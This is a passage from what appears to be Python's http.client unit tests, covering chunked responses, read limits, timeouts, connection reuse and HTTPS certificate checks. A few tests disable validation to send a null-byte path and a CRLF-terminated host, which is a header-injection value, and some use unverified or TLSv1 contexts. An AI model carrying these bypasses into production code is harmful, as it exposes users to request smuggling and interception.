            except client.IncompleteRead as i:
                self.assertEqual(i.partial, expected)
                expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
                self.assertEqual(repr(i), expected_message)
                self.assertEqual(str(i), expected_message)
            else:
                self.fail('IncompleteRead expected')
            finally:
                resp.close()

    def test_chunked_head(self):
        # A HEAD response advertising chunked encoding still has no body.
        chunked_start = (
            'HTTP/1.1 200 OK\r\n'
            'Transfer-Encoding: chunked\r\n\r\n'
            'a\r\n'
            'hello world\r\n'
            '1\r\n'
            'd\r\n'
        )
        sock = FakeSocket(chunked_start + last_chunk + chunked_end)
        resp = client.HTTPResponse(sock, method="HEAD")
        resp.begin()
        self.assertEqual(resp.read(), b'')
        self.assertEqual(resp.status, 200)
        self.assertEqual(resp.reason, 'OK')
        self.assertTrue(resp.isclosed())
        self.assertFalse(resp.closed)
        resp.close()
        self.assertTrue(resp.closed)

    def test_readinto_chunked_head(self):
        # Same as test_chunked_head, but via readinto().
        chunked_start = (
            'HTTP/1.1 200 OK\r\n'
            'Transfer-Encoding: chunked\r\n\r\n'
            'a\r\n'
            'hello world\r\n'
            '1\r\n'
            'd\r\n'
        )
        sock = FakeSocket(chunked_start + last_chunk + chunked_end)
        resp = client.HTTPResponse(sock, method="HEAD")
        resp.begin()
        b = bytearray(5)
        n = resp.readinto(b)
        self.assertEqual(n, 0)
        self.assertEqual(bytes(b), b'\x00'*5)
        self.assertEqual(resp.status, 200)
        self.assertEqual(resp.reason, 'OK')
        self.assertTrue(resp.isclosed())
        self.assertFalse(resp.closed)
        resp.close()
        self.assertTrue(resp.closed)

    def test_negative_content_length(self):
        # A negative Content-Length is ignored: read to connection close.
        sock = FakeSocket(
            'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.read(), b'Hello\r\n')
        self.assertTrue(resp.isclosed())

    def test_incomplete_read(self):
        sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        try:
            resp.read()
        except client.IncompleteRead as i:
            self.assertEqual(i.partial, b'Hello\r\n')
            self.assertEqual(repr(i),
                             "IncompleteRead(7 bytes read, 3 more expected)")
            self.assertEqual(str(i),
                             "IncompleteRead(7 bytes read, 3 more expected)")
            self.assertTrue(resp.isclosed())
        else:
            self.fail('IncompleteRead expected')

    def test_epipe(self):
        # The EPIPE from the broken pipe propagates as OSError, but the
        # response already received must still be readable afterwards.
        sock = EPipeSocket(
            "HTTP/1.0 401 Authorization Required\r\n"
            "Content-type: text/html\r\n"
            "WWW-Authenticate: Basic realm=\"example\"\r\n",
            b"Content-Length")
        conn = client.HTTPConnection("example.com")
        conn.sock = sock
        self.assertRaises(OSError,
                          lambda: conn.request("PUT", "/url", "body"))
        resp = conn.getresponse()
        self.assertEqual(401, resp.status)
        self.assertEqual("Basic realm=\"example\"",
                         resp.getheader("www-authenticate"))

    # Test lines overflowing the max line size (_MAXLINE in http.client)

    def test_overflowing_status_line(self):
        body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
        resp = client.HTTPResponse(FakeSocket(body))
        self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)

    def test_overflowing_header_line(self):
        body = (
            'HTTP/1.1 200 OK\r\n'
            'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
        )
        resp = client.HTTPResponse(FakeSocket(body))
        self.assertRaises(client.LineTooLong, resp.begin)

    def test_overflowing_header_limit_after_100(self):
        # The header-count limit also applies to headers that follow a
        # 100 Continue interim response.
        body = (
            'HTTP/1.1 100 OK\r\n'
            'r\n' * 32768
        )
        resp = client.HTTPResponse(FakeSocket(body))
        with self.assertRaises(client.HTTPException) as cm:
            resp.begin()
        # We must assert more because other reasonable errors that we
        # do not want can also be HTTPException derived.
        self.assertIn('got more than ', str(cm.exception))
        self.assertIn('headers', str(cm.exception))

    def test_overflowing_chunked_line(self):
        body = (
            'HTTP/1.1 200 OK\r\n'
            'Transfer-Encoding: chunked\r\n\r\n'
            + '0' * 65536 + 'a\r\n'
            'hello world\r\n'
            '0\r\n'
            '\r\n'
        )
        resp = client.HTTPResponse(FakeSocket(body))
        resp.begin()
        self.assertRaises(client.LineTooLong, resp.read)

    def test_early_eof(self):
        # Test httpresponse with no \r\n termination,
        body = "HTTP/1.1 200 Ok"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        self.assertEqual(resp.read(), b'')
        self.assertTrue(resp.isclosed())
        self.assertFalse(resp.closed)
        resp.close()
        self.assertTrue(resp.closed)

    def test_error_leak(self):
        # Test that the socket is not leaked if getresponse() fails
        conn = client.HTTPConnection('example.com')
        response = None
        class Response(client.HTTPResponse):
            def __init__(self, *pos, **kw):
                nonlocal response
                response = self  # Avoid garbage collector closing the socket
                client.HTTPResponse.__init__(self, *pos, **kw)
        conn.response_class = Response
        conn.sock = FakeSocket('Invalid status line')
        conn.request('GET', '/')
        self.assertRaises(client.BadStatusLine, conn.getresponse)
        self.assertTrue(response.closed)
        self.assertTrue(conn.sock.file_closed)

    def test_chunked_extension(self):
        # Chunk-size extensions (';foo=bar') must be parsed and ignored.
        extra = '3;foo=bar\r\n' + 'abc\r\n'
        expected = chunked_expected + b'abc'

        sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.read(), expected)
        resp.close()

    def test_chunked_missing_end(self):
        """some servers may serve up a short chunked encoding stream"""
        expected = chunked_expected
        sock = FakeSocket(chunked_start + last_chunk)  #no terminating crlf
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.read(), expected)
        resp.close()

    def test_chunked_trailers(self):
        """See that trailers are read and ignored"""
        expected = chunked_expected
        sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.read(), expected)
        # we should have reached the end of the file
        self.assertEqual(sock.file.read(), b"") #we read to the end
        resp.close()

    def test_chunked_sync(self):
        """Check that we don't read past the end of the chunked-encoding stream"""
        expected = chunked_expected
        extradata = "extradata"
        sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.read(), expected)
        # the file should now have our extradata ready to be read
        self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
        resp.close()

    def test_content_length_sync(self):
        """Check that we don't read past the end of the Content-Length stream"""
        extradata = b"extradata"
        expected = b"Hello123\r\n"
        sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.read(), expected)
        # the file should now have our extradata ready to be read
        self.assertEqual(sock.file.read(), extradata) #we read to the end
        resp.close()

    def test_readlines_content_length(self):
        extradata = b"extradata"
        expected = b"Hello123\r\n"
        sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.readlines(2000), [expected])
        # the file should now have our extradata ready to be read
        self.assertEqual(sock.file.read(), extradata) #we read to the end
        resp.close()

    def test_read1_content_length(self):
        extradata = b"extradata"
        expected = b"Hello123\r\n"
        sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.read1(2000), expected)
        # the file should now have our extradata ready to be read
        self.assertEqual(sock.file.read(), extradata) #we read to the end
        resp.close()

    def test_readline_bound_content_length(self):
        extradata = b"extradata"
        expected = b"Hello123\r\n"
        sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.readline(10), expected)
        self.assertEqual(resp.readline(10), b"")
        # the file should now have our extradata ready to be read
        self.assertEqual(sock.file.read(), extradata) #we read to the end
        resp.close()

    def test_read1_bound_content_length(self):
        extradata = b"extradata"
        expected = b"Hello123\r\n"
        sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.read1(20), expected*2)
        self.assertEqual(resp.read(), expected)
        # the file should now have our extradata ready to be read
        self.assertEqual(sock.file.read(), extradata) #we read to the end
        resp.close()

    def test_response_fileno(self):
        # Make sure fd returned by fileno is valid.
        threading = support.import_module("threading")

        serv = socket.socket(
            socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
        self.addCleanup(serv.close)
        serv.bind((HOST, 0))
        serv.listen()

        result = None
        def run_server():
            # Minimal server: consume the request headers, answer the
            # CONNECT, then capture whatever arrives on the raw socket.
            [conn, address] = serv.accept()
            with conn, conn.makefile("rb") as reader:
                # Read the request header until a blank line
                while True:
                    line = reader.readline()
                    if not line.rstrip(b"\r\n"):
                        break
                conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
                nonlocal result
                result = reader.read()

        thread = threading.Thread(target=run_server)
        thread.start()
        conn = client.HTTPConnection(*serv.getsockname())
        conn.request("CONNECT", "dummy:1234")
        response = conn.getresponse()
        try:
            self.assertEqual(response.status, client.OK)
            # Wrap the fd in a fresh socket object and write through it.
            s = socket.socket(fileno=response.fileno())
            try:
                s.sendall(b"proxied data\n")
            finally:
                s.detach()
        finally:
            response.close()
            conn.close()
        thread.join()
        self.assertEqual(result, b"proxied data\n")

    def test_putrequest_override_validation(self):
        """
        It should be possible to override the default validation
        behavior in putrequest (bpo-38216).
        """
        class UnsafeHTTPConnection(client.HTTPConnection):
            def _validate_path(self, url):
                pass

        conn = UnsafeHTTPConnection('example.com')
        conn.sock = FakeSocket('')
        # Contains an unmatched "\x00" which would normally be rejected.
        conn.putrequest('GET', '/\x00')

    def test_putrequest_override_encoding(self):
        """
        It should be possible to override the default encoding
        to transmit bytes in another encoding even if invalid
        (bpo-36274).
        """
        class UnsafeHTTPConnection(client.HTTPConnection):
            def _encode_request(self, str_url):
                return str_url.encode('utf-8')

        conn = UnsafeHTTPConnection('example.com')
        conn.sock = FakeSocket('')
        conn.putrequest('GET', '/☃')

    def test_putrequest_override_host_validation(self):
        class UnsafeHTTPConnection(client.HTTPConnection):
            def _validate_host(self, url):
                pass

        conn = UnsafeHTTPConnection('example.com\r\n')
        conn.sock = FakeSocket('')
        # set skip_host so a ValueError is not raised upon adding the
        # invalid URL as the value of the "Host:" header
        conn.putrequest('GET', '/', skip_host=1)
class ExtendedReadTest(TestCase):
    """
    Test peek(), read1(), readline()
    """
    # Raw HTTP exchange without Content-Length: the body runs to EOF.
    lines = (
        'HTTP/1.1 200 OK\r\n'
        '\r\n'
        'hello world!\n'
        'and now \n'
        'for something completely different\n'
        'foo'
    )
    # Just the body portion, as the response should deliver it.
    lines_expected = lines[lines.find('hello'):].encode("ascii")
    # The same body re-framed with chunked transfer coding (used by the
    # chunked subclass below).
    lines_chunked = (
        'HTTP/1.1 200 OK\r\n'
        'Transfer-Encoding: chunked\r\n\r\n'
        'a\r\n'
        'hello worl\r\n'
        '3\r\n'
        'd!\n\r\n'
        '9\r\n'
        'and now \n\r\n'
        '23\r\n'
        'for something completely different\n\r\n'
        '3\r\n'
        'foo\r\n'
        '0\r\n'  # terminating chunk
        '\r\n'   # end of trailers
    )

    def setUp(self):
        # Build a response wrapped in a BufferedReader so that peek()
        # and read1() exercise the buffered code paths.
        sock = FakeSocket(self.lines)
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        resp.fp = io.BufferedReader(resp.fp)
        self.resp = resp

    def test_peek(self):
        resp = self.resp
        # patch up the buffered peek so that it returns not too much stuff
        oldpeek = resp.fp.peek
        def mypeek(n=-1):
            p = oldpeek(n)
            if n >= 0:
                return p[:n]
            return p[:10]
        resp.fp.peek = mypeek

        all = []
        while True:
            # try a short peek
            p = resp.peek(3)
            if p:
                self.assertGreater(len(p), 0)
                # then unbounded peek
                p2 = resp.peek()
                self.assertGreaterEqual(len(p2), len(p))
                self.assertTrue(p2.startswith(p))
                # peek() must not consume: read() returns the same bytes.
                next = resp.read(len(p2))
                self.assertEqual(next, p2)
            else:
                next = resp.read()
                self.assertFalse(next)
            all.append(next)
            if not next:
                break
        self.assertEqual(b"".join(all), self.lines_expected)

    def test_readline(self):
        resp = self.resp
        self._verify_readline(self.resp.readline, self.lines_expected)

    def _verify_readline(self, readline, expected):
        # Drive `readline` with a small limit until EOF and check that
        # the concatenation reproduces `expected`.
        all = []
        while True:
            # short readlines
            line = readline(5)
            if line and line != b"foo":
                if len(line) < 5:
                    self.assertTrue(line.endswith(b"\n"))
            all.append(line)
            if not line:
                break
        self.assertEqual(b"".join(all), expected)

    def test_read1(self):
        resp = self.resp
        def r():
            # read1(4) may return fewer bytes, never more.
            res = resp.read1(4)
            self.assertLessEqual(len(res), 4)
            return res
        readliner = Readliner(r)
        self._verify_readline(readliner.readline, self.lines_expected)

    def test_read1_unbounded(self):
        resp = self.resp
        all = []
        while True:
            data = resp.read1()
            if not data:
                break
            all.append(data)
        self.assertEqual(b"".join(all), self.lines_expected)

    def test_read1_bounded(self):
        resp = self.resp
        all = []
        while True:
            data = resp.read1(10)
            if not data:
                break
            self.assertLessEqual(len(data), 10)
            all.append(data)
        self.assertEqual(b"".join(all), self.lines_expected)

    def test_read1_0(self):
        self.assertEqual(self.resp.read1(0), b"")

    def test_peek_0(self):
        p = self.resp.peek(0)
        self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
    """
    Test peek(), read1(), readline() in chunked mode
    """
    # Same body as the base class, but delivered via chunked transfer
    # coding; the inherited tests run unchanged against this framing.
    lines = (
        'HTTP/1.1 200 OK\r\n'
        'Transfer-Encoding: chunked\r\n\r\n'
        'a\r\n'
        'hello worl\r\n'
        '3\r\n'
        'd!\n\r\n'
        '9\r\n'
        'and now \n\r\n'
        '23\r\n'
        'for something completely different\n\r\n'
        '3\r\n'
        'foo\r\n'
        '0\r\n'  # terminating chunk
        '\r\n'   # end of trailers
    )
class Readliner:
    """Adapt an arbitrary chunk-returning read function into readline().

    ``readfunc`` is called with no arguments and must return b'' at EOF.
    ``readline(limit)`` returns at most *limit* bytes, stopping at the
    first newline (inclusive), at the byte limit, or at EOF — whichever
    comes first.  On an exception from ``readfunc`` the bytes gathered so
    far are stashed in ``self.remainder`` so a retry can continue.
    """

    def __init__(self, readfunc):
        self.readfunc = readfunc
        self.remainder = b""  # bytes read but not yet handed out

    def readline(self, limit):
        data = []
        datalen = 0
        read = self.remainder
        try:
            while True:
                idx = read.find(b'\n')
                if idx != -1:
                    break
                if datalen + len(read) >= limit:
                    # Cut the current chunk so the total returned is
                    # exactly `limit` bytes.
                    idx = limit - datalen - 1
                    # BUG FIX: this break was missing, so the loop kept
                    # reading, discarded the computed idx, and could
                    # return (far) more than `limit` bytes.
                    break
                # read more data
                data.append(read)
                # BUG FIX: track accumulated length so the limit check
                # accounts for previously buffered chunks, not only the
                # current one.
                datalen += len(read)
                read = self.readfunc()
                if not read:
                    idx = 0  # eof condition
                    break
            idx += 1
            data.append(read[:idx])
            self.remainder = read[idx:]
            return b"".join(data)
        except:
            # Preserve partial progress for the caller to retry.
            self.remainder = b"".join(data)
            raise
class OfflineTest(TestCase):
    """Checks that need no socket at all: module __all__, the responses
    mapping, and backward-compatible status-code constants."""

    def test_all(self):
        # Documented objects defined in the module should be in __all__
        expected = {"responses"}  # Allowlist documented dict() object
        # HTTPMessage, parse_headers(), and the HTTP status code constants are
        # intentionally omitted for simplicity
        blacklist = {"HTTPMessage", "parse_headers"}
        for name in dir(client):
            if name.startswith("_") or name in blacklist:
                continue
            module_object = getattr(client, name)
            if getattr(module_object, "__module__", None) == "http.client":
                expected.add(name)
        self.assertCountEqual(client.__all__, expected)

    def test_responses(self):
        self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")

    def test_client_constants(self):
        # Make sure we don't break backward compatibility with 3.4
        expected = [
            'CONTINUE',
            'SWITCHING_PROTOCOLS',
            'PROCESSING',
            'OK',
            'CREATED',
            'ACCEPTED',
            'NON_AUTHORITATIVE_INFORMATION',
            'NO_CONTENT',
            'RESET_CONTENT',
            'PARTIAL_CONTENT',
            'MULTI_STATUS',
            'IM_USED',
            'MULTIPLE_CHOICES',
            'MOVED_PERMANENTLY',
            'FOUND',
            'SEE_OTHER',
            'NOT_MODIFIED',
            'USE_PROXY',
            'TEMPORARY_REDIRECT',
            'BAD_REQUEST',
            'UNAUTHORIZED',
            'PAYMENT_REQUIRED',
            'FORBIDDEN',
            'NOT_FOUND',
            'METHOD_NOT_ALLOWED',
            'NOT_ACCEPTABLE',
            'PROXY_AUTHENTICATION_REQUIRED',
            'REQUEST_TIMEOUT',
            'CONFLICT',
            'GONE',
            'LENGTH_REQUIRED',
            'PRECONDITION_FAILED',
            'REQUEST_ENTITY_TOO_LARGE',
            'REQUEST_URI_TOO_LONG',
            'UNSUPPORTED_MEDIA_TYPE',
            'REQUESTED_RANGE_NOT_SATISFIABLE',
            'EXPECTATION_FAILED',
            'UNPROCESSABLE_ENTITY',
            'LOCKED',
            'FAILED_DEPENDENCY',
            'UPGRADE_REQUIRED',
            'PRECONDITION_REQUIRED',
            'TOO_MANY_REQUESTS',
            'REQUEST_HEADER_FIELDS_TOO_LARGE',
            'INTERNAL_SERVER_ERROR',
            'NOT_IMPLEMENTED',
            'BAD_GATEWAY',
            'SERVICE_UNAVAILABLE',
            'GATEWAY_TIMEOUT',
            'HTTP_VERSION_NOT_SUPPORTED',
            'INSUFFICIENT_STORAGE',
            'NOT_EXTENDED',
            'NETWORK_AUTHENTICATION_REQUIRED',
        ]
        for const in expected:
            with self.subTest(constant=const):
                self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
    """Verify the source_address argument is honoured by HTTP(S)Connection."""

    def setUp(self):
        self.conn = None
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.port = support.bind_port(self.serv)
        self.source_port = support.find_unused_port()
        self.serv.listen()

    def tearDown(self):
        if self.conn is not None:
            self.conn.close()
            self.conn = None
        self.serv.close()
        self.serv = None

    def testHTTPConnectionSourceAddress(self):
        self.conn = client.HTTPConnection(
            HOST, self.port, source_address=('', self.source_port))
        self.conn.connect()
        bound_port = self.conn.sock.getsockname()[1]
        self.assertEqual(bound_port, self.source_port)

    @unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
                     'http.client.HTTPSConnection not defined')
    def testHTTPSConnectionSourceAddress(self):
        self.conn = client.HTTPSConnection(
            HOST, self.port, source_address=('', self.source_port))
        # We don't test anything here other than the constructor not barfing as
        # this code doesn't deal with setting up an active running SSL server
        # for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
    """Check that timeout settings reach the underlying socket."""

    # Port of the listening server; class attribute so the test methods and
    # other suites (e.g. HTTPSTest.test_attributes) can reference it.
    PORT = None

    def setUp(self):
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        TimeoutTest.PORT = support.bind_port(self.serv)
        self.serv.listen()

    def tearDown(self):
        self.serv.close()
        self.serv = None

    def testTimeoutAttribute(self):
        # This will prove that the timeout gets through HTTPConnection
        # and into the socket.

        # default -- use global socket timeout
        self.assertIsNone(socket.getdefaulttimeout())
        socket.setdefaulttimeout(30)
        try:
            httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
            httpConn.connect()
        finally:
            # Always restore the process-wide default, even if connect() fails.
            socket.setdefaulttimeout(None)
        self.assertEqual(httpConn.sock.gettimeout(), 30)
        httpConn.close()

        # no timeout -- do not use global socket default
        self.assertIsNone(socket.getdefaulttimeout())
        socket.setdefaulttimeout(30)
        try:
            httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
                                             timeout=None)
            httpConn.connect()
        finally:
            socket.setdefaulttimeout(None)
        self.assertEqual(httpConn.sock.gettimeout(), None)
        httpConn.close()

        # a value
        httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
        httpConn.connect()
        self.assertEqual(httpConn.sock.gettimeout(), 30)
        httpConn.close()
class PersistenceTest(TestCase):
    """Connection reuse/reconnect behaviour of HTTPConnection."""

    def test_reuse_reconnect(self):
        # Should reuse or reconnect depending on header from server
        tests = (
            ('1.0', '', False),
            ('1.0', 'Connection: keep-alive\r\n', True),
            ('1.1', '', True),
            ('1.1', 'Connection: close\r\n', False),
            # Connection tokens are matched case-insensitively.
            ('1.0', 'Connection: keep-ALIVE\r\n', True),
            ('1.1', 'Connection: cloSE\r\n', False),
        )
        for version, header, reuse in tests:
            with self.subTest(version=version, header=header):
                msg = (
                    'HTTP/{} 200 OK\r\n'
                    '{}'
                    'Content-Length: 12\r\n'
                    '\r\n'
                    'Dummy body\r\n'
                ).format(version, header)
                conn = FakeSocketHTTPConnection(msg)
                self.assertIsNone(conn.sock)
                conn.request('GET', '/open-connection')
                with conn.getresponse() as response:
                    # conn.sock is dropped eagerly when reuse is impossible.
                    self.assertEqual(conn.sock is None, not reuse)
                    response.read()
                self.assertEqual(conn.sock is None, not reuse)
                self.assertEqual(conn.connections, 1)
                conn.request('GET', '/subsequent-request')
                self.assertEqual(conn.connections, 1 if reuse else 2)

    def test_disconnected(self):

        def make_reset_reader(text):
            """Return BufferedReader that raises ECONNRESET at EOF"""
            stream = io.BytesIO(text)
            def readinto(buffer):
                size = io.BytesIO.readinto(stream, buffer)
                if size == 0:
                    raise ConnectionResetError()
                return size
            # Patch the instance so BufferedReader's reads hit our hook.
            stream.readinto = readinto
            return io.BufferedReader(stream)

        tests = (
            (io.BytesIO, client.RemoteDisconnected),
            (make_reset_reader, ConnectionResetError),
        )
        for stream_factory, exception in tests:
            with self.subTest(exception=exception):
                conn = FakeSocketHTTPConnection(b'', stream_factory)
                conn.request('GET', '/eof-response')
                self.assertRaises(exception, conn.getresponse)
                self.assertIsNone(conn.sock)
                # HTTPConnection.connect() should be automatically invoked
                conn.request('GET', '/reconnect')
                self.assertEqual(conn.connections, 2)

    def test_100_close(self):
        conn = FakeSocketHTTPConnection(
            b'HTTP/1.1 100 Continue\r\n'
            b'\r\n'
            # Missing final response
        )
        conn.request('GET', '/', headers={'Expect': '100-continue'})
        self.assertRaises(client.RemoteDisconnected, conn.getresponse)
        self.assertIsNone(conn.sock)
        conn.request('GET', '/reconnect')
        self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
    """HTTPS connection tests: networked certificate validation plus local
    servers presenting known-good and known-bad certificates."""

    def setUp(self):
        if not hasattr(client, 'HTTPSConnection'):
            self.skipTest('ssl support required')

    def make_server(self, certfile):
        # Start a local HTTPS server presenting 'certfile'; cleanup is
        # registered against this TestCase by make_https_server.
        from test.ssl_servers import make_https_server
        return make_https_server(self, certfile=certfile)

    def test_attributes(self):
        # simple test to check it's storing the timeout
        h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
        self.assertEqual(h.timeout, 30)

    def test_networked(self):
        # Default settings: requires a valid cert from a trusted CA
        import ssl
        support.requires('network')
        with support.transient_internet('self-signed.pythontest.net'):
            h = client.HTTPSConnection('self-signed.pythontest.net', 443)
            with self.assertRaises(ssl.SSLError) as exc_info:
                h.request('GET', '/')
            self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')

    def test_networked_noverification(self):
        # Switch off cert verification
        import ssl
        support.requires('network')
        with support.transient_internet('self-signed.pythontest.net'):
            context = ssl._create_unverified_context()
            h = client.HTTPSConnection('self-signed.pythontest.net', 443,
                                       context=context)
            h.request('GET', '/')
            resp = h.getresponse()
            h.close()
            self.assertIn('nginx', resp.getheader('server'))
            resp.close()

    @support.system_must_validate_cert
    def test_networked_trusted_by_default_cert(self):
        # Default settings: requires a valid cert from a trusted CA
        support.requires('network')
        with support.transient_internet('www.python.org'):
            h = client.HTTPSConnection('www.python.org', 443)
            h.request('GET', '/')
            resp = h.getresponse()
            content_type = resp.getheader('content-type')
            resp.close()
            h.close()
            self.assertIn('text/html', content_type)

    def test_networked_good_cert(self):
        # We feed the server's cert as a validating cert
        import ssl
        support.requires('network')
        with support.transient_internet('self-signed.pythontest.net'):
            context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
            context.verify_mode = ssl.CERT_REQUIRED
            context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
            h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
            h.request('GET', '/')
            resp = h.getresponse()
            server_string = resp.getheader('server')
            resp.close()
            h.close()
            self.assertIn('nginx', server_string)

    def test_networked_bad_cert(self):
        # We feed a "CA" cert that is unrelated to the server's cert
        import ssl
        support.requires('network')
        with support.transient_internet('self-signed.pythontest.net'):
            context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
            context.verify_mode = ssl.CERT_REQUIRED
            context.load_verify_locations(CERT_localhost)
            h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
            with self.assertRaises(ssl.SSLError) as exc_info:
                h.request('GET', '/')
            self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')

    def test_local_unknown_cert(self):
        # The custom cert isn't known to the default trust bundle
        import ssl
        server = self.make_server(CERT_localhost)
        h = client.HTTPSConnection('localhost', server.port)
        with self.assertRaises(ssl.SSLError) as exc_info:
            h.request('GET', '/')
        self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')

    def test_local_good_hostname(self):
        # The (valid) cert validates the HTTP hostname
        import ssl
        server = self.make_server(CERT_localhost)
        context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        context.verify_mode = ssl.CERT_REQUIRED
        context.load_verify_locations(CERT_localhost)
        h = client.HTTPSConnection('localhost', server.port, context=context)
        self.addCleanup(h.close)
        h.request('GET', '/nonexistent')
        resp = h.getresponse()
        self.addCleanup(resp.close)
        # 404 is fine: the TLS handshake (what we care about) succeeded.
        self.assertEqual(resp.status, 404)

    def test_local_bad_hostname(self):
        # The (valid) cert doesn't validate the HTTP hostname
        import ssl
        server = self.make_server(CERT_fakehostname)
        context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        context.verify_mode = ssl.CERT_REQUIRED
        context.check_hostname = True
        context.load_verify_locations(CERT_fakehostname)
        h = client.HTTPSConnection('localhost', server.port, context=context)
        with self.assertRaises(ssl.CertificateError):
            h.request('GET', '/')

        # Same with explicit check_hostname=True
        h = client.HTTPSConnection('localhost', server.port, context=context,
                                   check_hostname=True)
        with self.assertRaises(ssl.CertificateError):
            h.request('GET', '/')

        # With check_hostname=False, the mismatching is ignored
        context.check_hostname = False
        h = client.HTTPSConnection('localhost', server.port, context=context,
                                   check_hostname=False)
        h.request('GET', '/nonexistent')
        resp = h.getresponse()
        resp.close()
        h.close()
        self.assertEqual(resp.status, 404)

        # The context's check_hostname setting is used if one isn't passed to
        # HTTPSConnection.
        context.check_hostname = False
        h = client.HTTPSConnection('localhost', server.port, context=context)
        h.request('GET', '/nonexistent')
        resp = h.getresponse()
        self.assertEqual(resp.status, 404)
        resp.close()
        h.close()

        # Passing check_hostname to HTTPSConnection should override the
        # context's setting.
        h = client.HTTPSConnection('localhost', server.port, context=context,
                                   check_hostname=True)
        with self.assertRaises(ssl.CertificateError):
            h.request('GET', '/')

    @unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
                     'http.client.HTTPSConnection not available')
    def test_host_port(self):
        # Check invalid host_port
        for hp in ("www.python.org:abc", "user:password@www.python.org"):
            self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)

        for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
                          "fe80::207:e9ff:fe9b", 8000),
                         ("www.python.org:443", "www.python.org", 443),
                         ("www.python.org:", "www.python.org", 443),
                         ("www.python.org", "www.python.org", 443),
                         ("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
                         ("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
                          443)):
            c = client.HTTPSConnection(hp)
            self.assertEqual(h, c.host)
            self.assertEqual(p, c.port)
class RequestBodyTest(TestCase):
    """Test cases where a request includes a message body."""

    def setUp(self):
        self.conn = client.HTTPConnection('example.com')
        # Capture everything the connection writes into a fake socket; no
        # real network is involved.  (Fixed: the original assigned
        # self.conn.sock twice; the chained assignment already covers both.)
        self.conn.sock = self.sock = FakeSocket("")

    def get_headers_and_fp(self):
        """Parse the bytes the connection wrote and return (headers, body-fp)."""
        f = io.BytesIO(self.sock.data)
        f.readline()  # read the request line
        message = client.parse_headers(f)
        return message, f

    def test_manual_content_length(self):
        # Set an incorrect content-length so that we can verify that
        # it will not be over-ridden by the library.
        self.conn.request("PUT", "/url", "body",
                          {"Content-Length": "42"})
        message, f = self.get_headers_and_fp()
        self.assertEqual("42", message.get("content-length"))
        self.assertEqual(4, len(f.read()))

    def test_ascii_body(self):
        self.conn.request("PUT", "/url", "body")
        message, f = self.get_headers_and_fp()
        self.assertEqual("text/plain", message.get_content_type())
        self.assertIsNone(message.get_charset())
        self.assertEqual("4", message.get("content-length"))
        self.assertEqual(b'body', f.read())

    def test_latin1_body(self):
        # Non-ASCII str bodies are encoded as latin-1 on the wire.
        self.conn.request("PUT", "/url", "body\xc1")
        message, f = self.get_headers_and_fp()
        self.assertEqual("text/plain", message.get_content_type())
        self.assertIsNone(message.get_charset())
        self.assertEqual("5", message.get("content-length"))
